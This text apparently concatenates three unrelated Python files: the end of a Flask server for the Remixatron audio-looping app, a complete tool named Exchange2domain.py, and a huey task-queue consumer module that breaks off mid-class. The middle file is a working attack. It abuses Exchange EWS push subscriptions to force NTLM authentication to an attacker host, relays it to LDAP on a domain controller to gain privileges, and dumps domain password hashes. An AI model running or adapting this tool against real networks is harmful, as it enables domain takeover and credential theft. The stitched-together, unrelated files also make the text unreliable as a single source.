default_error_handler(e): """ The default error handler for the flask_socketio module. Just print the error to the console. Args: e (flask_socketio.Error): the error """ print(e) @socketio.on('connect') def on_connect(): """ This gets fired when the client connects (or re-connects) via the socketio library. (See https://www.socket.io for more details) Returns: flask.Response: a Flask Response object """ deviceid = get_userid() print('******** ' + get_userid() + ' has connected. ********') # if there's no device id already set for the client, create one and # store it if deviceid == None: deviceid = secrets.token_urlsafe(16) resp = make_response(deviceid,200) resp.set_cookie('deviceid',deviceid, max_age=31536000) return resp print( deviceid + ' has connected') # make sure there's an entry for this device in the messageQueues dictionary if deviceid not in messageQueues: messageQueues[deviceid] = collections.deque(maxlen=50) def fetch_from_youtube(url, userid): """ Fetches the reuquested audio from Youtube, and trims any leading or trailing silence from it via ffmpeg. This uses the python module youtube-dl. Args: url (string): the url to fetch userid (string): the device asking for this Returns: string: the final file name of the retrieved and trimmed audio. """ # this function runs out-of-process from the main serving thread, so # send an update to the client. post_status_message(userid, 0.05, "Asking Youtube for audio...") # download the file (audio only) at the highest quality and save it in /tmp try: cmd = ['youtube-dl', '--write-info-json', '-x', '--audio-format', 'best', '--audio-quality', '0', '-o', tempfile.gettempdir() + '/' + userid + '.tmp', url] result = [line.decode(encoding="utf-8") for line in subprocess.check_output(cmd).splitlines()] print("Youtube-dl output [{}]".format(result)) except subprocess.CalledProcessError as e: post_status_message(userid, 1, "Failed to download the audio from Youtube. Check the logs!") raise IOError("Failed to download the audio from Youtube. Please check you're running the latest " "version (latest available at `https://yt-dl.org/downloads/latest/youtube-dl`)") fn = ":".join(result[-2].split(":")[1:])[1:] # trim silence from the ends and save as ogg of = tempfile.gettempdir() + '/' + userid + '.ogg' print("Input file [{}]".format(fn)) print("Output file [{}]".format(of)) post_status_message(userid, 0.1, "Trimming silence from the ends...") filter = "silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse,silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse" result = subprocess.run(['ffmpeg', '-y', '-i', fn, '-af', filter, of], stderr=subprocess.PIPE, stdout=subprocess.PIPE) # delete the downlaoded file because we don't need it anymore os.remove(fn) # return the name of the trimmed file return of def fetch_from_local(fn, userid): """ Trim and prepare an audio file uploaded from the user Args: fn (string): the filename that was uploaded userid (string): the client asking for this Returns: string: the file name of the final prepard file """ # trim silence from the ends and save as ogg of = tempfile.gettempdir() + '/' + userid + '.ogg' post_status_message(userid, 0.1, "Trimming silence from the ends...") filter = "silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse,silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse" result = subprocess.run(['ffmpeg', '-y', '-i', fn, '-af', filter, of], stderr=subprocess.PIPE, stdout=subprocess.PIPE) # delete the uploaded file os.remove(fn) # return the name of the trimmed file return of @app.route('/healthcheck') def healthcheck(): """ Use /healthcheck if you put this server behind a load balancer that does HTTP health checks Returns: srtring: returns an HTTP 200 "OK" """ return "OK" @app.route('/') def index(): """ Return the main index page Returns: flask.Response: a redirect to the main index page """ return redirect_https('static', 'index.html') @app.route('/favicon.ico') def icon(): """ Return the application icon Returns: flask.Response: a redirect to the application icon """ return redirect_https('static', 'favicon.ico') @app.route('/icon.png') def png(): """ Return the application image for the navbar UI Returns: flask.Response: a redirect to the image """ return redirect_https('static', 'icon.png') @app.route('/fetch_url') def fetch_url(): """ Starts the background processing of the Youtube fetch request. Returns: flask.Response: If this is called from the browser address bar, then it will redirect back to the index page. """ clusters = 0 url = request.args['url'] if 'clusters' in request.args: clusters = int(request.args['clusters']) useCache = True if 'useCache' in request.args: useCache = bool(int(request.args['useCache'])) deviceid = get_userid() print( deviceid, 'asked for:', url, 'with', clusters, 'clusters and useCache of', useCache) # if there is already a proc entry for this client, then # kill it if it's running. proc = None if deviceid in procMap: proc = procMap[deviceid] if proc != None and proc.is_alive(): print('!!!!!! killing', proc.pid, '!!!!!') proc.terminate() # start the main audio processing proc and save a pointer to it # for this client procMap[deviceid] = Process(target=process_audio, args=(url, deviceid, False, clusters, useCache)) procMap[deviceid].start() return index() @app.route('/cancel_fetch') def cancel_fetch(): """ Cancels the current audio processing Returns: flask.Response: HTTP 200 OK """ deviceid = get_userid() print('cancelling work for', deviceid) # if we're not processing for this client already, just return if deviceid not in procMap: return 'OK' # otherwise, kill the running process if it's still running proc = procMap[deviceid] if proc != None and proc.is_alive(): print('!!!!!! killing', proc.pid, '!!!!!') proc.terminate() # return return 'OK' def post_status_message( userid, percentage, message ): """ The main audio processing is done outside of the main thread. From time to time during that processing, we will want to post an update to the client about what's going on. To do this, we call back into the /relay endpoint. That enpoint exists in the main web thread and can send messages via scoket.io. Args: userid (string): the client id to whom to send the message percentage (float): the precentage complete message (string): the text update """ payload = json.dumps({'percentage': percentage, 'message':message}) requests.get( 'http://localhost:8000/relay', params={'namespace': '/' + userid, 'event':'status', 'message': payload} ) def process_audio(url, userid, isupload=False, clusters=0, useCache=True): """ The main processing for the audio is done here. It makes heavy use of the InfiniteJukebox class (https://github.com/drensin/Remixatron). Args: url (string): the URL to fetch or the file uploaded userid (string): the id of the requesting client isupload (bool, optional): Is this processing for uploaded audio (True) or Youtube audio (False). Defaults to False. """ fn = "" if isupload == False: fn = fetch_from_youtube(url,userid) else: fn = fetch_from_local(url, userid) print('fetch complete') # The constructor of the InfiniteJukebox class takes a callback to which to # post update messages. We define that callback here so that it has access # to the userid variable. This uses Python 'variable capture'. # (See https://bit.ly/2YOKm16 for more about how this works) def remixatron_callback(percentage, message): print( str(percentage * 100) + "%: " + message ) post_status_message(userid, percentage, message) remixatron_callback(0.1, 'Audio downloaded') cached_beatmap_fn = tempfile.gettempdir() + '/' + urllib.parse.quote(url, safe='') + ".beatmap.bz2" beats = None play_vector = None if (os.path.isfile(cached_beatmap_fn) == False) or (useCache == False): # all of the core analytics and processing is done in this call jukebox = InfiniteJukebox(fn, clusters=clusters, progress_callback=remixatron_callback, start_beat=0, do_async=False) beats = jukebox.beats play_vector = jukebox.play_vector def skip_encoder(o): return '' with bz2.open(cached_beatmap_fn, 'wb') as f: f.write(json.dumps(jukebox.beats, default=skip_encoder).encode('utf-8')) else: print("Reading beatmap from disk.") with bz2.open(cached_beatmap_fn, 'rb') as f: beats = json.load(f) play_vector = InfiniteJukebox.CreatePlayVectorFromBeats(beats, start_beat=0) # save off a dictionary of all the beats of the song. We care about the id, when the # beat starts, how long it lasts, to which segment and cluster it belongs, and which # other beats (jump candidates) it might make sense to jump. # # See https://github.com/drensin/Remixatron for a fuller explanation of these terms. beatmap = [] for beat in beats: b = {'id':beat['id'], 'start':beat['start'] * 1000.00, 'duration':beat['duration'] * 1000.00, 'segment':beat['segment'], 'cluster':beat['cluster'], 'jump_candidate':beat['jump_candidates']} beatmap.append(b) with open(tempfile.gettempdir() + '/' + userid + '.beatmap', 'w') as f: f.write(json.dumps(beatmap)) # save off a 1024 * 1024 vector of beats to play. This is the random(ish)ly # generated play path through the song. with open(tempfile.gettempdir() + '/' + userid + '.playvector', 'w') as f: f.write(json.dumps(play_vector)) # signal the client that we're done processing ready_msg = {'message':'ready'} requests.get( 'http://localhost:8000/relay', params={'namespace': '/' + userid, 'event':'ready', 'message': json.dumps(ready_msg)} ) @app.route('/relay') def relay(): """ The audio processing sub-process will need to send messages back to the client. In order to use socket.io, however, you have to be in the main Flaks context. So, the process will call this endpoint and this function will then use socket.io to pass the message along to the client. Returns: flask.Response: HTTP 200 OK """ namespace = request.args['namespace'] message = request.args['message'] event_name = request.args['event'] # get the message queue for this client q = messageQueues[namespace[1:]] # compute the next message id. id = 0 if len(q) > 0: id = max([i['id'] for i in q]) + 1 # append this message to the queue q.append({'id': id, 'event': event_name, 'message':message}) # finally, send the message to the client, making sure to save # off the new message id. j = {'id':id, 'message':message} if event_name == 'status': j = json.loads(message) j['id'] = id socketio.emit(event_name, json.dumps(j), namespace=namespace) return 'OK', [('Content-Type', 'text/plain')] @app.route('/getQueue') def getQueue(): """ The client will sometimes get disconnected and need to reconnect. When that happens it will ask for the current queue of messages it has received. The client keeps the id of the last message it processed locally, so we just return the entire queue (which is only 50 deep -- or 400 bytes after compression) Returns: string: json object represting the message queue """ q = messageQueues[get_userid()] items = [] for i in q: items.append(i) return json.dumps(items), [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/beatmap') def get_beatmap(): """ Return the beatmap for this audio. See the process_audio() function for more info about this. Returns: string: JSON of the beatmap """ json = "" with open(tempfile.gettempdir() + '/' + get_userid() + '.beatmap', 'r') as f: json = f.readlines() return json[0], [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/playvector') def get_playvector(): """ Return the play vector for this audio. See the process_audio() function for more info about this. Returns: string: JSON of the play vector """ json = "" with open(tempfile.gettempdir() + '/' + get_userid() + '.playvector', 'r') as f: json = f.readlines() return json[0], [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/getaudio') def get_audio(): """ Sends to the client the audio to play for this song Returns: flask.Response: the audio file to play """ return send_from_directory(tempfile.gettempdir() + '/', get_userid() + '.ogg', cache_timeout=0) @app.route('/trackinfo') def get_trackinfo(): """ Return the tack information about this audio. The key items are the URL (or file name) of the audio, a url to a tumbnail image to display, and the title of the track. Returns: flask.Response: JSON of the track info """ json = "" with open(tempfile.gettempdir() + '/' + get_userid() + '.tmp.info.json', 'r') as f: json = f.readlines() return json[0], [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/whoami') def whoami(): """ Called first by the client, this sets up the device id and the message and process queues. Returns: flask.Response: the device id for the client """ # if this client doesn't already have a device id configured and # saved in a cookie, then set one up. deviceid = get_userid() if deviceid == None: deviceid = secrets.token_urlsafe(16) resp = make_response(deviceid,200) resp.set_cookie('deviceid',deviceid,max_age=31536000) return resp print( deviceid + ' has connected') # make sure the message queues and process queue is setup # for this client. if deviceid not in messageQueues: messageQueues[deviceid] = collections.deque(maxlen=50) if deviceid not in procMap: procMap[deviceid] = None return deviceid @app.route('/cleanup') def cleanup(): """ When the client has retrieved everything it needs, then it will call /cleanup to get rid of any of the intermediate files. Returns: flask.Response: HTTP 200 OK """ fileList = glob.glob(tempfile.gettempdir() + '/' + get_userid() + '*') for file in fileList: os.remove(file) messageQueues[get_userid()].clear() return "OK" @app.route('/upload_audio', methods=['POST']) def upload_audio(): """ The client uploads audio to process to this endpoint Returns: falsk.Response: a redirect to the index.html page """ file = request.files['file'] deviceid = get_userid() # save the uploaded file of = tempfile.gettempdir() + '/' +deviceid + '.tmp' file.save(of) print( deviceid + ' uploaded: ' + file.filename ) # save off the track info with open(tempfile.gettempdir() + '/' + deviceid + '.tmp.info.json', 'w') as f: j = {'title': file.filename, 'thumbnail':'/static/favicon.ico'} f.write(json.dumps(j)) # if there's already an audio processing subproc running for this client, # then kill it. proc = procMap[deviceid] if proc != None and proc.is_alive(): print('!!!!!! killing', proc.pid, '!!!!!') proc.terminate() # kick of a proc to process the audio. procMap[deviceid] = Process(target=process_audio, args=(of, deviceid, True)) procMap[deviceid].start() return index() if __name__ == '__main__': # The main thread. Listens on any IP address and port 8000 compress.init_app(app) socketio.run(app, host="0.0.0.0", port=8000)
Exchange2domain.py
#!/usr/bin/env python # -*- coding: UTF-8 -*- import ssl import argparse import logging import sys import getpass import base64 import re import binascii import time import config import xml.etree.ElementTree as ET from httplib import HTTPConnection, HTTPSConnection, ResponseNotReady from impacket import ntlm from comm import logger from comm.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer from comm.ntlmrelayx.utils.config import NTLMRelayxConfig from comm.ntlmrelayx.utils.targetsutils import TargetsProcessor from comm.ntlmrelayx.clients import PROTOCOL_CLIENTS from comm.ntlmrelayx.attacks import PROTOCOL_ATTACKS from multiprocessing import Manager from threading import Thread, Lock, currentThread from comm.secretsdump import DumpSecrets # Init logging logger.init() logging.getLogger().setLevel(logging.INFO) start = time.time() LOGO =R""" โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–’โ–ˆโ–ˆ โ–ˆโ–ˆโ–’ โ–„โ–ˆโ–ˆโ–ˆโ–ˆโ–„ โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆ โ–„โ–„โ–„ โ–ˆโ–ˆโ–ˆโ–„ โ–ˆ โ–„โ–ˆโ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–“โ–ˆ โ–€ โ–’โ–’ โ–ˆ โ–ˆ โ–’โ–‘โ–’โ–ˆโ–ˆโ–€ โ–€โ–ˆ โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–„ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–ˆโ–ˆโ–’ โ–€โ–ˆโ–’โ–“โ–ˆ โ–€ โ–’โ–ˆโ–ˆโ–ˆ โ–‘โ–‘ โ–ˆ โ–‘โ–’โ–“โ–ˆ โ–„ โ–’โ–ˆโ–ˆโ–€โ–€โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆ โ–€โ–ˆโ–„ โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–‘โ–„โ–„โ–„โ–‘โ–’โ–ˆโ–ˆโ–ˆ โ–’โ–“โ–ˆ โ–„ โ–‘ โ–ˆ โ–ˆ โ–’ โ–’โ–“โ–“โ–„ โ–„โ–ˆโ–ˆโ–’โ–‘โ–“โ–ˆ โ–‘โ–ˆโ–ˆ โ–‘โ–ˆโ–ˆโ–„โ–„โ–„โ–„โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–‘โ–“โ–ˆ โ–ˆโ–ˆโ–“โ–’โ–“โ–ˆ โ–„ โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–’ โ–’โ–ˆโ–ˆโ–’โ–’ โ–“โ–ˆโ–ˆโ–ˆโ–€ โ–‘โ–‘โ–“โ–ˆโ–’โ–‘โ–ˆโ–ˆโ–“ โ–“โ–ˆ โ–“โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–‘โ–’โ–“โ–ˆโ–ˆโ–ˆโ–€โ–’โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–’ โ–‘โ–‘ โ–’โ–‘ โ–‘โ–’โ–’ โ–‘ โ–‘โ–“ โ–‘โ–‘ โ–‘โ–’ โ–’ โ–‘ โ–’ โ–‘โ–‘โ–’โ–‘โ–’ โ–’โ–’ โ–“โ–’โ–ˆโ–‘โ–‘ โ–’โ–‘ โ–’ โ–’ โ–‘โ–’ โ–’ โ–‘โ–‘ โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–‘โ–’ โ–‘ โ–‘ โ–’ โ–’ โ–‘โ–’โ–‘ โ–‘ โ–’ โ–’โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ """ # SOAP request for EWS # Source: https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/subscribe-operation # Credits: https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange POST_BODY = '''<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"> <soap:Header> <t:RequestServerVersion Version="%s" /> </soap:Header> <soap:Body > <m:Subscribe> <m:PushSubscriptionRequest SubscribeToAllFolders="true"> <t:EventTypes> <t:EventType>NewMailEvent</t:EventType> <t:EventType>ModifiedEvent</t:EventType> <t:EventType>MovedEvent</t:EventType> </t:EventTypes> <t:StatusFrequency>1</t:StatusFrequency> <t:URL>%s</t:URL> </m:PushSubscriptionRequest> </m:Subscribe> </soap:Body> </soap:Envelope> ''' def startServers(passargs): targetSystem = passargs.target_host privuser = passargs.user PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict relayServers = [HTTPRelayServer] serverThreads = [] for server in relayServers: c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setTargets(TargetsProcessor(singleTarget=str("ldap://"+targetSystem),protocolClients=PROTOCOL_CLIENTS)) c.setOutputFile(None) c.setEncoding('ascii') c.setMode('RELAY') c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir('.') c.setInterfaceIp("0.0.0.0") c.setInterfacePort(int(passargs.attacker_port)) c.setLDAPOptions(True, True, True, privuser) c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = server(c) s.start() serverThreads.append(s) logging.info("Relay servers started, waiting for connection....") try: status = exploit(passargs) if status: exp = Thread(target=checkauth, args=(passargs,)) exp.daemon = True exp.start() try: while exp.isAlive(): pass except KeyboardInterrupt, e: logging.info("Shutting down...") for thread in serverThreads: thread.server.shutdown() else: logging.error("Error in exploit, Shutting down...") for thread in serverThreads: thread.server.shutdown() except: logging.error("Error in exploit, Shutting down...") logging.info("Shutting down...") def checkauth(passargs): suc = config.get_suc() logging.info("Waiting for Auth...") while True: if suc == True: gethash(passargs) break else: suc = config.get_suc() fal = config.get_fail() if fal == True: logging.error("Get auth failed, exiting...") break else: tmp = time.time() - start if tmp > passargs.timeout: logging.error("Time Out. exiting...") break def gethash(passargs): remoteName = passargs.target_host username = passargs.user password = passargs.password domain = passargs.domain execmethod = passargs.exec_method if passargs.just_dc_user: dcuser = passargs.just_dc_user else: dcuser = None getpriv = config.get_priv() while True: if getpriv == True: dumper = DumpSecrets(remoteName, username, password, domain,execmethod,dcuser) try: check = dumper.dump() break except Exception, e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error(e) else: getpriv = config.get_priv() def exploit(args): ews_url = "/EWS/Exchange.asmx" exchange_version = args.exchange_version # Should we log debug stuff? if args.debug is True: logging.getLogger().setLevel(logging.DEBUG) if args.password is None and args.hashes is None: args.password = getpass.getpass() # Init connection if not args.no_ssl: # HTTPS = default port = 443 if args.exchange_port: port = int(args.exchange_port) try: uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) session = HTTPSConnection(args.host, port, timeout=10,context=uv_context) except AttributeError: session = HTTPSConnection(args.host, port, timeout=10) else: # Otherwise: HTTP port = 80 if args.exchange_port: port = int(args.exchange_port) session = HTTPConnection(args.host, port, timeout=10) # Construct attacker url if args.attacker_port != 80: attacker_url = 'http://%s:%d%s' % (args.attacker_host, int(args.attacker_port), args.attacker_page) else: attacker_url = 'http://%s%s' % (args.attacker_host, args.attacker_page) logging.info('Using attacker URL: %s', attacker_url) # Use impacket for NTLM ntlm_nego = ntlm.getNTLMSSPType1(args.attacker_host, domain=args.domain) #Negotiate auth negotiate = base64.b64encode(ntlm_nego.getData()) # Headers # Source: https://github.com/thezdi/PoC/blob/master/CVE-2018-8581/Exch_EWS_pushSubscribe.py headers = { "Authorization": 'NTLM %s' % negotiate, "Content-type": "text/xml; charset=utf-8", "Accept": "text/xml", "User-Agent": "ExchangeServicesClient/0.0.0.0", "Translate": "F" } session.request("POST", ews_url, POST_BODY % (exchange_version,attacker_url), headers) res = session.getresponse() res.read() # Copied from ntlmrelayx httpclient.py if res.status != 401: logging.info('Status code returned: %d. Authentication does not seem required for URL', res.status) try: if 'NTLM' not in res.getheader('WWW-Authenticate'): logging.error('NTLM Auth not offered by URL, offered protocols: %s', res.getheader('WWW-Authenticate')) return False except (KeyError, TypeError): logging.error('No authentication requested by the server for url %s', ews_url) return False logging.debug('Got 401, performing NTLM authentication') # Get negotiate data try: ntlm_challenge_b64 = re.search('NTLM ([a-zA-Z0-9+/]+={0,2})', res.getheader('WWW-Authenticate')).group(1) ntlm_challenge = base64.b64decode(ntlm_challenge_b64) except (IndexError, KeyError, AttributeError): logging.error('No NTLM challenge returned from server') return False if args.hashes: lm_hash_h, nt_hash_h = args.hashes.split(':') # Convert to binary format lm_hash = binascii.unhexlify(lm_hash_h) nt_hash = binascii.unhexlify(nt_hash_h) args.password = '' else: nt_hash = '' lm_hash = '' ntlm_auth, _ = ntlm.getNTLMSSPType3(ntlm_nego, ntlm_challenge, args.user, args.password, args.domain, lm_hash, nt_hash) auth = base64.b64encode(ntlm_auth.getData()) #print("Get Auth: "+auth) headers = { "Authorization": 'NTLM %s' % auth, "Content-type": "text/xml; charset=utf-8", "Accept": "text/xml", "User-Agent": "ExchangeServicesClient/0.0.0.0", "Translate": "F" } session.request("POST", ews_url, POST_BODY % (exchange_version,attacker_url), headers) res = session.getresponse() logging.debug('HTTP status: %d', res.status) body = res.read() logging.debug('Body returned: %s', body) if res.status == 200: logging.info('Exchange returned HTTP status 200 - authentication was OK') # Parse XML with ElementTree root = ET.fromstring(body) code = None for response in root.iter('{http://schemas.microsoft.com/exchange/services/2006/messages}ResponseCode'): code = response.text if not code: logging.error('Could not find response code element in body: %s', body) return False if code == 'NoError': logging.critical('API call was successful') return True elif code == 'ErrorMissingEmailAddress': logging.error('The user you authenticated with does not have a mailbox associated. Try a different user.') return False else: logging.error('Unknown error %s', code) for errmsg in root.iter('{http://schemas.microsoft.com/exchange/services/2006/messages}ResponseMessages'): logging.error('Server returned: %s', errmsg.text) return False elif res.status == 401: logging.error('Server returned HTTP status 401 - authentication failed') return False else: logging.error('Server returned HTTP %d: %s', res.status, body) return True def main(): parser = argparse.ArgumentParser(description='Exchange your privileges for Domain Admin privs by abusing Exchange. Use me with ntlmrelayx') parser.add_argument("host", type=str, metavar='HOSTNAME', help="Hostname/ip of the Exchange server") parser.add_argument("-u", "--user", metavar='USERNAME', help="username for authentication") parser.add_argument("-d", "--domain", metavar='DOMAIN', help="domain the user is in (FQDN or NETBIOS domain name)") parser.add_argument("-p", "--password", metavar='PASSWORD', help="Password for authentication, will prompt if not specified and no NT:NTLM hashes are supplied") parser.add_argument('--hashes', action='store', help='LM:NLTM hashes') parser.add_argument("--no-ssl", action='store_true', help="Don't use HTTPS (connects on port 80)") parser.add_argument("--exchange-port", help="Alternative EWS port (default: 443 or 80)") parser.add_argument("-ah", "--attacker-host", required=True, help="Attacker hostname or IP") parser.add_argument("-ap", "--attacker-port", default=80, help="Port on which the relay attack runs (default: 80)") parser.add_argument("-th", "--target-host", required=True, help="Hostname or IP of the DC") parser.add_argument("-t", "--timeout", default='120',type=int, help='timeout in seconds') parser.add_argument('--exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec', help='Remote exec ' 'method to use at target (only when using -use-vss). Default: smbexec') parser.add_argument("--exchange-version",default='Exchange2013',help='Exchange version of the target (default: Exchange2013, choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2,Exchange2013,Exchange2013_SP1,Exchange2016)',) parser.add_argument("--attacker-page", default="/privexchange/", help="Page to request on attacker server (default: /privexchange/)") parser.add_argument('--just-dc-user', action='store', metavar='USERNAME', help='Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach.') parser.add_argument("--debug", action='store_true', help='Enable debug output') passargs = parser.parse_args() startServers(passargs) if __name__ == '__main__': print(LOGO) main()
consumer.py
import datetime import logging import os import signal import threading import time from collections import defaultdict from multiprocessing import Event as ProcessEvent from multiprocessing import Process try: import gevent from gevent import Greenlet from gevent.event import Event as GreenEvent except ImportError: Greenlet = GreenEvent = None from huey.exceptions import DataStoreGetException from huey.exceptions import QueueException from huey.exceptions import QueueReadException from huey.exceptions import DataStorePutException from huey.exceptions import QueueWriteException from huey.exceptions import ScheduleAddException from huey.exceptions import ScheduleReadException from huey.registry import registry EVENT_CHECKING_PERIODIC = 'checking-periodic' EVENT_ERROR_DEQUEUEING = 'error-dequeueing' EVENT_ERROR_ENQUEUEING = 'error-enqueueing' EVENT_ERROR_INTERNAL = 'error-internal' EVENT_ERROR_SCHEDULING = 'error-scheduling' EVENT_ERROR_STORING_RESULT = 'error-storing-result' EVENT_ERROR_TASK = 'error-task' EVENT_FINISHED = 'finished' EVENT_RETRYING = 'retrying' EVENT_REVOKED = 'revoked' EVENT_SCHEDULED = 'scheduled' EVENT_SCHEDULING_PERIODIC = 'scheduling-periodic' EVENT_STARTED = 'started' def to_timestamp(dt): if dt: return time.mktime(dt.timetuple()) class BaseProcess(object): def __init__(self, huey, utc): self.huey = huey self.utc = utc def get_now(self): if self.utc: return datetime.datetime.utcnow() return datetime.datetime.now() def get_timestamp(self): return time.mktime(self.get_now().timetuple()) def sleep_for_interval(self, start_ts, nseconds): delta = time.time() - start_ts if delta < nseconds: seconds = nseconds - (time.time() - start_ts) self._logger.debug('Sleeping for %s' % seconds) time.sleep(nseconds - (time.time() - start_ts)) def enqueue(self, task): try: self.huey.enqueue(task) except QueueWriteException: self.huey.emit_task(EVENT_ERROR_ENQUEUEING, task, error=True) self._logger.error('Error enqueueing task: %s' % task) else: self._logger.debug('Enqueued task: %s' % task) def loop(self, now=None): raise NotImplementedError class Worker(BaseProcess): def __init__(self, huey, default_delay, max_delay, backoff, utc): self.delay = self.default_delay = default_delay self.max_delay = max_delay self.backoff = backoff self._logger = logging.getLogger('huey.consumer.Worker') super(Worker, self).__init__(huey, utc) def loop(self, now=None): task = None exc_raised = True try: task = self.huey.dequeue() except QueueReadException as exc: self.huey.emit_task(EVENT_ERROR_DEQUEUEING, task, error=True) self._logger.exception('Error reading from queue') except QueueException: self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True) self._logger.exception('Queue exception') except KeyboardInterrupt: raise except: self.huey.emit_task(EVENT_ERROR_DEQUEUEING, task, error=True) self._logger.exception('Unknown exception dequeueing task.') else: exc_raised = False if task: self.delay = self.default_delay self.handle_task(task, now or self.get_now()) elif exc_raised or not self.huey.blocking: self.sleep() def sleep(self): if self.delay > self.max_delay: self.delay = self.max_delay self._logger.debug('No messages, sleeping for: %s' % self.delay) time.sleep(self.delay) self.delay *= self.backoff def handle_task(self, task, ts): if not self.huey.ready_to_run(task, ts): self.add_schedule(task) elif not self.is_revoked(task, ts): self.process_task(task, ts) else: self.huey.emit_task( EVENT_REVOKED, task, timestamp=to_timestamp(ts)) self._logger.debug('Task %s was revoked, not running' % task) def _incr_metadata(self, task, key, value=1): self.huey.incr_metadata('_'.join((task.name, key)), value) self.huey.incr_metadata('_'.join(('tasks', key)), value) def process_task(self, task, ts): self.huey.emit_task(EVENT_STARTED, task, timestamp=to_timestamp(ts)) self._logger.info('Executing %s' % task) start = time.time() try: try: self.huey.execute(task) finally: duration = time.time() - start self._logger.debug('Task %s ran in %0.3fs' % (task, duration)) except DataStorePutException: self.huey.emit_task( EVENT_ERROR_STORING_RESULT, task, error=True, duration=duration) self._logger.exception('Error storing result') except: self.huey.emit_task( EVENT_ERROR_TASK, task, error=True, duration=duration) self._incr_metadata(task, 'errors') self._logger.exception('Unhandled exception in worker thread') if task.retries: self.requeue_task(task, self.get_now()) else: self.huey.emit_task( EVENT_FINISHED, task, duration=duration, timestamp=self.get_timestamp()) self._incr_metadata(task, 'executed') self._incr_metadata(task, 'duration', duration) def requeue_task(self, task, ts): task.retries -= 1 self.huey.emit_task(EVENT_RETRYING, task) self._logger.info('Re-enqueueing task %s, %s tries left' % (task.task_id, task.retries)) if task.retry_delay: delay = datetime.timedelta(seconds=task.retry_delay) task.execute_time = ts + delay self.add_schedule(task) else: self.enqueue(task) def add_schedule(self, task): self._logger.info('Adding %s to schedule' % task) try: self.huey.add_schedule(task) except ScheduleAddException: self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True) self._logger.error('Error adding task to schedule: %s' % task) else: self.huey.emit_task(EVENT_SCHEDULED, task) self._incr_metadata(task, 'scheduled') def is_revoked(self, task, ts): try: if self.huey.is_revoked(task, ts, peek=False): return True return False except DataStoreGetException: self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True) self._logger.error('Error checking if task is revoked: %s' % task) return True class Scheduler(BaseProcess): def __init__(self, huey, interval, utc, periodic): super(Scheduler, self).__init__(huey, utc) self.interval = min(interval, 60) self.periodic = periodic if periodic: # Determine the periodic task interval. self._q, self._r = divmod(60, self.interval) if not self._r: self._q -= 1 self._counter = 0 self._logger = logging.getLogger('huey.consumer.Scheduler') def loop(self, now=None): now = now or self.get_now() start = time.time() for task in self.huey.read_schedule(now): self._logger.info('Scheduling %s for execution' % task) self.enqueue(task) should_sleep = True if self.periodic: if self._counter == self._q: if self._r: self.sleep_for_interval(start, self._r) self.huey.emit_status( EVENT_CHECKING_PERIODIC, timestamp=self.get_timestamp()) self._logger.debug('Checking periodic tasks') self._counter = 0 for task in self.huey.read_periodic(now): self.huey.emit_task( EVENT_SCHEDULING_PERIODIC, task, timestamp=self.get_timestamp()) self._logger.info('Scheduling periodic task %s.' % task) self.enqueue(task) self.sleep_for_interval(start, self.interval - self._r) should_sleep = False else: self._counter += 1 if should_sleep: self.sleep_for_interval(start, self.interval) class Environment(object): def get_stop_flag(self): raise NotImplementedError def create_process(self, runnable, name): raise NotImplementedError class 